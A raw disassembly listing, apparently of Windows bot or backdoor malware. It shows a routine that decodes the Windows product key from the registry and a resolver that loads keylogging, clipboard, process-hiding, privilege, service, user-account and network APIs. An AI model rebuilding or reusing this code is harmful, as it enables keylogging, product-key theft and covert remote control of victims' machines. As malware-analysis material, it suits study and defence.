jnb short loc_407953
mov [ebp+ecx*4+var_124], eax
inc [ebp+var_128]
loc_407953: ; CODE XREF: sub_4077DC+163�j
; sub_4077DC+168�j
cmp eax, [ebp+var_C]
jbe loc_407B88
mov [ebp+var_C], eax
jmp loc_407B88
; ---------------------------------------------------------------------------
loc_407964: ; CODE XREF: sub_4077DC+121�j
mov edi, 1000h
push edi
lea eax, [ebp+var_2AF0]
push ebx
push eax
call sub_40D7B0
push edi
lea eax, [ebp+var_1AF0]
push ebx
push eax
call sub_40D7B0
add esp, 18h
push ebx
push edi
lea eax, [ebp+var_2AF0]
push eax
push esi
call dword_4C45F4
test eax, eax
jg short loc_4079ED
push esi
call dword_4C479C
xor eax, eax
cmp [ebp+var_128], ebx
jbe loc_407B88
loc_4079B1: ; CODE XREF: sub_4077DC+1E5�j
cmp [ebp+eax*4+var_124], esi
jz short loc_4079D7
inc eax
cmp eax, [ebp+var_128]
jb short loc_4079B1
jmp loc_407B88
; ---------------------------------------------------------------------------
loc_4079C8: ; CODE XREF: sub_4077DC+204�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
inc eax
loc_4079D7: ; CODE XREF: sub_4077DC+1DC�j
mov ecx, [ebp+var_128]
dec ecx
cmp eax, ecx
jb short loc_4079C8
dec [ebp+var_128]
jmp loc_407B88
; ---------------------------------------------------------------------------
loc_4079ED: ; CODE XREF: sub_4077DC+1BE�j
push 104h
lea eax, [ebp+var_340]
push ebx
push eax
call sub_40D7B0
lea eax, [ebp+var_2AF0]
push eax
mov [ebp+var_4], ebx
xor esi, esi
call sub_40D630
add esp, 10h
test eax, eax
jbe loc_407B88
loc_407A1B: ; CODE XREF: sub_4077DC+2F7�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_2AF0]
cmp al, 0Ah
mov [ebp+esi+var_1AF0], al
jnz loc_407ABF
mov esi, offset aGet ; "GET "
lea eax, [ebp+var_1AF0]
push esi
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_407A94
lea eax, [ebp+var_1AF0]
push eax
call sub_40D630
cmp eax, 5
pop ecx
jbe short loc_407A94
mov eax, offset asc_419D4C ; " "
push eax
push eax
lea eax, [ebp+var_1AF0]
push esi
push eax
call sub_40D810
pop ecx
pop ecx
push eax
call sub_40D810
pop ecx
pop ecx
push eax
call sub_40E1DE
push eax
lea eax, [ebp+var_340]
push eax
call sub_40D8A0
add esp, 10h
jmp short loc_407AAB
; ---------------------------------------------------------------------------
loc_407A94: ; CODE XREF: sub_4077DC+26E�j
; sub_4077DC+280�j
lea eax, [ebp+var_1AF0]
push offset asc_41A920 ; "\r\n"
push eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_407ADE
loc_407AAB: ; CODE XREF: sub_4077DC+2B6�j
push edi
lea eax, [ebp+var_1AF0]
push ebx
push eax
call sub_40D7B0
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_407ABF: ; CODE XREF: sub_4077DC+252�j
inc [ebp+var_4]
lea eax, [ebp+var_2AF0]
push eax
inc esi
call sub_40D630
cmp [ebp+var_4], eax
pop ecx
jb loc_407A1B
jmp loc_407B88
; ---------------------------------------------------------------------------
loc_407ADE: ; CODE XREF: sub_4077DC+2CD�j
mov ecx, [ebp+var_128]
xor eax, eax
cmp ecx, ebx
jbe short loc_407B1D
loc_407AEA: ; CODE XREF: sub_4077DC+31D�j
mov edx, [ebp+eax*4+var_124]
cmp edx, [ebp+arg_0]
jz short loc_407B12
inc eax
cmp eax, ecx
jb short loc_407AEA
jmp short loc_407B1D
; ---------------------------------------------------------------------------
loc_407AFD: ; CODE XREF: sub_4077DC+339�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
mov ecx, [ebp+var_128]
inc eax
loc_407B12: ; CODE XREF: sub_4077DC+318�j
dec ecx
cmp eax, ecx
jb short loc_407AFD
dec [ebp+var_128]
loc_407B1D: ; CODE XREF: sub_4077DC+30C�j
; sub_4077DC+31F�j
lea eax, [ebp+var_464]
push eax
call sub_40D630
mov esi, eax
lea eax, [ebp+var_340]
push eax
call sub_40D630
add esi, eax
cmp esi, 104h
pop ecx
pop ecx
jnb short loc_407B7F
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push [ebp+arg_0]
mov [ebp+var_4], ebx
call dword_4C4624
push [ebp+var_358]
lea eax, [ebp+var_340]
push [ebp+var_34C]
push eax
lea eax, [ebp+var_464]
push eax
push [ebp+arg_0]
call sub_40752D
add esp, 14h
jmp short loc_407B88
; ---------------------------------------------------------------------------
loc_407B7F: ; CODE XREF: sub_4077DC+365�j
push [ebp+arg_0]
call dword_4C479C
loc_407B88: ; CODE XREF: sub_4077DC+118�j
; sub_4077DC+141�j ...
mov esi, [ebp+arg_0]
inc esi
cmp esi, [ebp+var_C]
mov [ebp+arg_0], esi
jbe loc_4078E4
push 41h
pop ecx
push ebx
push ebx
lea eax, [ebp+var_23C]
push ebx
push eax
mov eax, [ebp+var_C]
jmp loc_4078C0
; ---------------------------------------------------------------------------
loc_407BAD: ; CODE XREF: sub_4077DC+FD�j
mov edi, [ebp+var_8]
loc_407BB0: ; CODE XREF: sub_4077DC+6A�j
; sub_4077DC+92�j ...
call dword_4C4748
push eax
lea eax, [ebp+var_AF0]
push offset aErrorShitFaile ; "Error: shit failed, returned: <%d>."
push eax
call sub_40D6BB
add esp, 0Ch
cmp [ebp+var_350], ebx
jnz short loc_407BF5
push [ebp+var_354]
lea eax, [ebp+var_AF0]
push eax
lea eax, [ebp+var_6EC]
push eax
push [ebp+var_6F0]
call sub_4017B6
add esp, 10h
loc_407BF5: ; CODE XREF: sub_4077DC+3F5�j
lea eax, [ebp+var_AF0]
push eax
call sub_401648
pop ecx
push edi
call dword_4C479C
push [ebp+var_358]
call sub_40AADD
pop ecx
push ebx
call dword_4190D8 ; ExitThread
int 3 ; Trap to Debugger
sub_4077DC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407C1D proc near ; CODE XREF: sub_40198E+2F6�p
; sub_40198E+CCA�p ...
var_400 = byte ptr -400h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_400]
push 400h
push eax
call sub_40EB48
add esp, 10h
lea eax, [ebp+var_400]
push 0
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_400]
push eax
push [ebp+arg_0]
call dword_4C4724
leave
retn
sub_407C1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_407C63 proc near ; CODE XREF: sub_40198E+CFD�p
var_B0 = byte ptr -0B0h
var_7C = byte ptr -7Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 0B0h
push esi
lea eax, [ebp+70h+var_8]
push eax
push 20019h
push 3
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
push 80000002h
xor esi, esi
call dword_419018 ; RegOpenKeyExA
test eax, eax
jnz loc_407D36
lea eax, [ebp+70h+var_C]
push eax
lea eax, [ebp+70h+var_B0]
push eax
push esi
push esi
push offset aDigitalproduct ; "DigitalProductId"
push [ebp+70h+var_8]
mov [ebp+70h+var_C], 0A4h
call dword_419000 ; RegQueryValueExA
test eax, eax
jnz short loc_407D2D
push ebx
xor ebx, ebx
cmp [ebp+70h+arg_4], esi
push edi
setnz bl
push 0Fh
pop ecx
lea esi, [ebp+70h+var_7C]
lea edi, [ebp+70h+var_B0]
rep movsb
lea ebx, ds:18h[ebx*4]
add ebx, [ebp+70h+arg_0]
mov [ebp+70h+var_4], 18h
loc_407CDD: ; CODE XREF: sub_407C63+C3�j
push 0Eh
xor eax, eax
pop esi
loc_407CE2: ; CODE XREF: sub_407C63+9A�j
lea ecx, [ebp+esi+70h+var_B0]
movzx edx, byte ptr [ecx]
shl eax, 8
xor eax, edx
xor edx, edx
push 18h
pop edi
div edi
dec esi
cmp esi, 0FFFFFFFFh
mov [ecx], al
mov eax, edx
jg short loc_407CE2
mov al, byte_41A92C[eax]
mov [ebx], al
mov eax, [ebp+70h+var_4]
push 5
cdq
pop ecx
idiv ecx
dec ebx
test edx, edx
jnz short loc_407D23
cmp [ebp+70h+var_4], edx
jle short loc_407D23
cmp [ebp+70h+arg_4], edx
jz short loc_407D23
mov byte ptr [ebx], 2Dh
dec ebx
loc_407D23: ; CODE XREF: sub_407C63+B0�j
; sub_407C63+B5�j ...
dec [ebp+70h+var_4]
jns short loc_407CDD
xor esi, esi
pop edi
inc esi
pop ebx
loc_407D2D: ; CODE XREF: sub_407C63+52�j
push [ebp+70h+var_8]
call dword_419014 ; RegCloseKey
loc_407D36: ; CODE XREF: sub_407C63+2B�j
mov eax, esi
pop esi
add ebp, 70h
leave
retn
sub_407C63 endp
; =============== S U B R O U T I N E =======================================
sub_407D3E proc near ; CODE XREF: sub_404BAB+25�p
push ebx
push ebp
mov ebp, dword_419094
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, dword_4190F8
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_407E5E
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_4C4664, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov dword_4C467C, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov dword_4C46DC, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov dword_4C4634, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_4C46A8, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_4C4688, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_4C472C, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_4C460C, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_4C46B0, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_4C46D4, eax
call esi ; GetProcAddress
cmp dword_4C4664, ebx
mov dword_4C4738, eax
jz short loc_407E3C
cmp dword_4C467C, ebx
jz short loc_407E3C
cmp dword_4C46DC, ebx
jz short loc_407E3C
cmp dword_4C4634, ebx
jz short loc_407E3C
cmp dword_4C4688, ebx
jz short loc_407E3C
cmp dword_4C472C, ebx
jz short loc_407E3C
cmp dword_4C460C, ebx
jz short loc_407E3C
cmp dword_4C46B0, ebx
jz short loc_407E3C
cmp dword_4C46D4, ebx
jz short loc_407E3C
cmp eax, ebx
jnz short loc_407E46
loc_407E3C: ; CODE XREF: sub_407D3E+B8�j
; sub_407D3E+C0�j ...
mov dword_4C47E4, 1
loc_407E46: ; CODE XREF: sub_407D3E+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_4C478C, eax
jz short loc_407E73
push 1
push ebx
call eax
jmp short loc_407E73
; ---------------------------------------------------------------------------
loc_407E5E: ; CODE XREF: sub_407D3E+1D�j
call dword_4190AC ; RtlGetLastWin32Error
mov dword_4C47E8, eax
mov dword_4C47E4, 1
loc_407E73: ; CODE XREF: sub_407D3E+117�j
; sub_407D3E+11E�j
push offset aUser32_dll ; "user32.dll"
call dword_4190F0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_407F88
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_4C4750, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
mov dword_4C46E8, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_4C4614, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_4C4684, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_4C462C, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_4C47C0, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_4C4610, eax
call esi ; GetProcAddress
cmp dword_4C4750, ebx
mov dword_4C4728, eax
jz short loc_407F2C
cmp dword_4C46E8, ebx
jz short loc_407F2C
cmp dword_4C4614, ebx
jz short loc_407F2C
cmp dword_4C4684, ebx
jz short loc_407F2C
cmp dword_4C462C, ebx
jz short loc_407F2C
cmp dword_4C47C0, ebx
jz short loc_407F2C
cmp dword_4C4610, ebx
jz short loc_407F2C
cmp eax, ebx
jnz short loc_407F36
loc_407F2C: ; CODE XREF: sub_407D3E+1B8�j
; sub_407D3E+1C0�j ...
mov dword_4C47EC, 1
loc_407F36: ; CODE XREF: sub_407D3E+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; GetProcAddress
push offset aGetkeystate ; "GetKeyState"
push edi
mov dword_4C4630, eax
call esi ; GetProcAddress
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov dword_4C47B0, eax
call esi ; GetProcAddress
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov dword_4C4640, eax
call esi ; GetProcAddress
cmp dword_4C4630, ebx
mov dword_4C4650, eax
jz short loc_407F93
cmp dword_4C47B0, ebx
jz short loc_407F93
cmp dword_4C4640, ebx
jz short loc_407F93
cmp eax, ebx
jnz short loc_407F9D
jmp short loc_407F93
; ---------------------------------------------------------------------------
loc_407F88: ; CODE XREF: sub_407D3E+144�j
call dword_4190AC ; RtlGetLastWin32Error
mov dword_4C47F0, eax
loc_407F93: ; CODE XREF: sub_407D3E+232�j
; sub_407D3E+23A�j ...
mov dword_4C47EC, 1
loc_407F9D: ; CODE XREF: sub_407D3E+246�j
push offset aUserenv_dll ; "userenv.dll"
call dword_4190F0 ; LoadLibraryA
cmp eax, ebx
jz short loc_407FBF
push offset aGetuserprofile ; "GetUserProfileDirectoryA"
push eax
call esi ; GetProcAddress
cmp eax, ebx
mov dword_4C47E0, eax
jnz short loc_407FD4
jmp short loc_407FCA
; ---------------------------------------------------------------------------
loc_407FBF: ; CODE XREF: sub_407D3E+26C�j
call dword_4190AC ; RtlGetLastWin32Error
mov dword_4C4850, eax
loc_407FCA: ; CODE XREF: sub_407D3E+27F�j
mov dword_4C484C, 1
loc_407FD4: ; CODE XREF: sub_407D3E+27D�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_40816F
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_4C47BC, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_4C46D8, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_4C4670, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_4C4648, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_4C46CC, eax
call esi ; GetProcAddress
cmp dword_4C47BC, ebx
mov dword_4C476C, eax
jz short loc_40805F
cmp dword_4C46D8, ebx
jz short loc_40805F
cmp dword_4C4670, ebx
jz short loc_40805F
cmp dword_4C4648, ebx
jz short loc_40805F
cmp dword_4C46CC, ebx
jz short loc_40805F
cmp eax, ebx
jnz short loc_408069
loc_40805F: ; CODE XREF: sub_407D3E+2FB�j
; sub_407D3E+303�j ...
mov dword_4C47F4, 1
loc_408069: ; CODE XREF: sub_407D3E+31F�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_4C47C8, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_4C47AC, eax
call esi ; GetProcAddress
cmp dword_4C47C8, ebx
mov dword_4C46F8, eax
jz short loc_4080A4
cmp dword_4C47AC, ebx
jz short loc_4080A4
cmp eax, ebx
jnz short loc_4080AE
loc_4080A4: ; CODE XREF: sub_407D3E+358�j
; sub_407D3E+360�j
mov dword_4C47F4, 1
loc_4080AE: ; CODE XREF: sub_407D3E+364�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_4C474C, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_4C47CC, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov dword_4C4754, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_4C4770, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_4C4680, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_4C46C0, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_4C475C, eax
call esi ; GetProcAddress
cmp dword_4C474C, ebx
mov dword_4C4788, eax
jz short loc_408152
cmp dword_4C47CC, ebx
jz short loc_408152
cmp dword_4C4754, ebx
jz short loc_408152
cmp dword_4C4770, ebx
jz short loc_408152
cmp dword_4C4680, ebx
jz short loc_408152
cmp dword_4C46C0, ebx
jz short loc_408152
cmp dword_4C475C, ebx
jz short loc_408152
cmp eax, ebx
jnz short loc_40815C
loc_408152: ; CODE XREF: sub_407D3E+3DE�j
; sub_407D3E+3E6�j ...
mov dword_4C47F4, 1
loc_40815C: ; CODE XREF: sub_407D3E+412�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_4C4720, eax
jnz short loc_408184
jmp short loc_40817A
; ---------------------------------------------------------------------------
loc_40816F: ; CODE XREF: sub_407D3E+2A1�j
call dword_4190AC ; RtlGetLastWin32Error
mov dword_4C47F8, eax
loc_40817A: ; CODE XREF: sub_407D3E+42F�j
mov dword_4C47F4, 1
loc_408184: ; CODE XREF: sub_407D3E+42D�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_408250
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_4C47D0, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_4C47A0, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_4C4708, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_4C4700, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov dword_4C4744, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov dword_4C461C, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_4C4718, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_4C46BC, eax
call esi ; GetProcAddress
cmp dword_4C47D0, ebx
mov dword_4C470C, eax
jz short loc_40825B
cmp dword_4C47A0, ebx
jz short loc_40825B
cmp dword_4C4708, ebx
jz short loc_40825B
cmp dword_4C4700, ebx
jz short loc_40825B
cmp dword_4C4744, ebx
jz short loc_40825B
cmp dword_4C461C, ebx
jz short loc_40825B
cmp dword_4C4718, ebx
jz short loc_40825B
cmp dword_4C46BC, ebx
jz short loc_40825B
cmp eax, ebx
jnz short loc_408265
jmp short loc_40825B
; ---------------------------------------------------------------------------
loc_408250: ; CODE XREF: sub_407D3E+451�j
call dword_4190AC ; RtlGetLastWin32Error
mov dword_4C4800, eax
loc_40825B: ; CODE XREF: sub_407D3E+4D2�j
; sub_407D3E+4DA�j ...
mov dword_4C47FC, 1
loc_408265: ; CODE XREF: sub_407D3E+50E�j
push offset aWs2_32_dll ; "ws2_32.dll"
call dword_4190F0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40862E
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_4C46A0, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_4C4604, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_4C471C, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_4C46E4, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_4C4764, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_4C4748, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov dword_4C47A8, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_4C4690, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov dword_4C4624, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_4C463C, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov dword_4C4710, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov dword_4C4704, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov dword_4C47DC, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov dword_4C47B8, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov dword_4C4784, eax
call esi ; GetProcAddress
push offset aSend ; "send"
push edi
mov dword_4C4760, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov dword_4C4724, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov dword_4C465C, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_4C45F4, eax
call esi ; GetProcAddress
mov dword_4C4618, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov dword_4C4768, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov dword_4C4734, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov dword_4C47B4, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_4C464C, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov dword_4C46AC, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov dword_4C45F8, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_4C47A4, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_4C46F0, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov dword_4C4780, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov dword_4C46D0, eax
call esi ; GetProcAddress
cmp dword_4C46A0, ebx
mov dword_4C479C, eax
jz loc_408515
cmp dword_4C4604, ebx
jz loc_408515
cmp dword_4C471C, ebx
jz loc_408515
cmp dword_4C4764, ebx
jz loc_408515
cmp dword_4C4748, ebx
jz loc_408515
cmp dword_4C47A8, ebx
jz loc_408515
cmp dword_4C4690, ebx
jz loc_408515
cmp dword_4C4624, ebx
jz loc_408515
cmp dword_4C463C, ebx
jz loc_408515
cmp dword_4C4710, ebx
jz loc_408515
cmp dword_4C4704, ebx
jz loc_408515
cmp dword_4C47DC, ebx
jz short loc_408515
cmp dword_4C47B8, ebx
jz short loc_408515
cmp dword_4C4784, ebx
jz short loc_408515
cmp dword_4C4724, ebx
jz short loc_408515
cmp dword_4C465C, ebx
jz short loc_408515
cmp dword_4C45F4, ebx
jz short loc_408515
cmp dword_4C4618, ebx
jz short loc_408515
cmp dword_4C4768, ebx
jz short loc_408515
cmp dword_4C4734, ebx
jz short loc_408515
cmp dword_4C47B4, ebx
jz short loc_408515
cmp dword_4C464C, ebx
jz short loc_408515
cmp dword_4C46AC, ebx
jz short loc_408515
cmp dword_4C45F8, ebx
jz short loc_408515
cmp dword_4C47A4, ebx
jz short loc_408515
cmp dword_4C46F0, ebx
jz short loc_408515
cmp dword_4C4780, ebx
jz short loc_408515
cmp eax, ebx
jnz short loc_40851F
loc_408515: ; CODE XREF: sub_407D3E+6D5�j
; sub_407D3E+6E1�j ...
mov dword_4C4804, 1
loc_40851F: ; CODE XREF: sub_407D3E+7D5�j
mov ebp, dword_4190AC
loc_408525: ; CODE XREF: sub_407D3E+907�j
push offset aWininet_dll ; "wininet.dll"
call dword_4190F0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40864A
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_4C4608, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_4C47D8, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_4C46B8, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_4C47D4, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_4C46C4, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_4C4628, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_4C4698, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_4C4600, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_4C473C, eax
call esi ; GetProcAddress
cmp dword_4C4608, ebx
mov ecx, dword_4C4628
mov dword_4C46EC, eax
jz short loc_40860A
cmp dword_4C47D8, ebx
jz short loc_40860A
cmp dword_4C46B8, ebx
jz short loc_40860A
cmp dword_4C47D4, ebx
jz short loc_40860A
cmp dword_4C46C4, ebx
jz short loc_40860A
cmp ecx, ebx
jz short loc_40860A
cmp dword_4C4698, ebx
jz short loc_40860A
cmp dword_4C4600, ebx
jz short loc_40860A
cmp dword_4C473C, ebx
jz short loc_40860A
cmp eax, ebx
jnz short loc_408614
loc_40860A: ; CODE XREF: sub_407D3E+88A�j
; sub_407D3E+892�j ...
mov dword_4C480C, 1
loc_408614: ; CODE XREF: sub_407D3E+8CA�j
cmp ecx, ebx
jz short loc_408661
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx
cmp eax, ebx
mov dword_4C468C, eax
jnz short loc_408661
jmp short loc_40865B
; ---------------------------------------------------------------------------
loc_40862E: ; CODE XREF: sub_407D3E+536�j
mov ebp, dword_4190AC
call ebp ; RtlGetLastWin32Error
mov dword_4C4808, eax
mov dword_4C4804, 1
jmp loc_408525
; ---------------------------------------------------------------------------
loc_40864A: ; CODE XREF: sub_407D3E+7F6�j
call ebp ; RtlGetLastWin32Error
mov dword_4C4810, eax
mov dword_4C480C, 1
loc_40865B: ; CODE XREF: sub_407D3E+8EE�j
mov dword_4C468C, ebx
loc_408661: ; CODE XREF: sub_407D3E+8D8�j
; sub_407D3E+8EC�j
push offset aNetapi32_dll ; "netapi32.dll"
call dword_4190F0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40875B
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_4C4674, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_4C4694, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_4C4790, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_4C4638, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_4C46C8, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_4C45FC, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_4C4658, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_4C4758, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_4C466C, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_4C4678, eax
call esi ; GetProcAddress
cmp dword_4C4674, ebx
mov dword_4C46A4, eax
jz short loc_408762
cmp dword_4C4694, ebx
jz short loc_408762
cmp dword_4C4790, ebx
jz short loc_408762
cmp dword_4C4638, ebx
jz short loc_408762
cmp dword_4C46C8, ebx
jz short loc_408762
cmp dword_4C45FC, ebx
jz short loc_408762
cmp dword_4C4658, ebx
jz short loc_408762
